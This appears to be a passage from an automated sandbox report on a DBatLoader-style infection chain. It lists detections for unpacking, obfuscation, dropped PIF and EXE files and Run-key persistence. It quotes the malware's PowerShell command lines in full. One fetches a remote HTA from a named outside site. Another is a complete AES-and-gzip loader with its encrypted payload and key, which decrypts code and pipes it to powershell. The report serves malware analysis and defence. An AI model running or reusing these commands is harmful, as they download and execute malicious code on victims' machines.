Source:	Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 19.2.uc.exe.2980000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.Tra

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior

Binary contains a suspicious time stamp

Source: bwsiuvcU.pif.19.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

19_2_02997AC0

PE file contains sections with non-standard names

Source: easinvoker.exe.19.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.19.dr	Static PE information: section name: .xdata
Source: netutils.dll.19.dr	Static PE information: section name: /4
Source: netutils.dll.19.dr	Static PE information: section name: /19
Source: netutils.dll.19.dr	Static PE information: section name: /31
Source: netutils.dll.19.dr	Static PE information: section name: /45
Source: netutils.dll.19.dr	Static PE information: section name: /57
Source: netutils.dll.19.dr	Static PE information: section name: /70
Source: netutils.dll.19.dr	Static PE information: section name: /81
Source: netutils.dll.19.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95FB5D push esp; retf	17_2_00007FFAAB95FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB958167 push ebx; ret	17_2_00007FFAAB95816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB9584E1 push es; ret	17_2_00007FFAAB9584E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB950CCE pushad ; retf	17_2_00007FFAAB950D3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA244B4 push cs; ret	17_2_00007FFAABA244B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2433D push cs; ret	17_2_00007FFAABA2433F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA24390 push cs; ret	17_2_00007FFAABA24392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA242E8 push cs; ret	17_2_00007FFAABA242EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA24209 push cs; ret	17_2_00007FFAABA24232
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2914E push ss; ret	17_2_00007FFAABA2914F
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029832F0 push eax; ret	19_2_0298332C
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA2F4 push 029AA35Fh; ret	19_2_029AA357
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299D20C push ecx; mov dword ptr [esp], edx	19_2_0299D211
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986372 push 029863CFh; ret	19_2_029863C7
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986374 push 029863CFh; ret	19_2_029863C7
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA0AC push 029AA125h; ret	19_2_029AA11D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02993028 push 02993075h; ret	19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02993027 push 02993075h; ret	19_2_0299306D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA1F8 push 029AA288h; ret	19_2_029AA280
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA144 push 029AA1ECh; ret	19_2_029AA1E4
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298673E push 02986782h; ret	19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986740 push 02986782h; ret	19_2_0298677A
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298C528 push ecx; mov dword ptr [esp], edx	19_2_0298C52D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298D55C push 0298D588h; ret	19_2_0298D580
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298CBA8 push 0298CD2Eh; ret	19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02999B58 push 02999B90h; ret	19_2_02999B88
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029A9B70 push 029A9D8Eh; ret	19_2_029A9D86
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0298C8D6 push 0298CD2Eh; ret	19_2_0298CD26
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029978C8 push 02997945h; ret	19_2_0299793D
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02996902 push 029969AFh; ret	19_2_029969A7
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02996904 push 029969AFh; ret	19_2_029969A7

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs	High entropy of concatenated method names: 'ICAyBoI8nQ', 'KDikMXewCI', 'L8eyiSD8RZ', 'NWhy3UvHJp', 'hrcyqFProH', 'xbkytiDasQ', 'cE1voes021ZUN', 'ErtcfHgK7I', 'NFQcC8bA4F', 'TE6czWL5Zk'

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\bwsiuvcU.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Ucvuiswb.PIF			Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Ucvuiswb.PIF	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\uc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\uc.exe	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\uc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb			Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ucvuiswb			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02999B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_02999B94

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
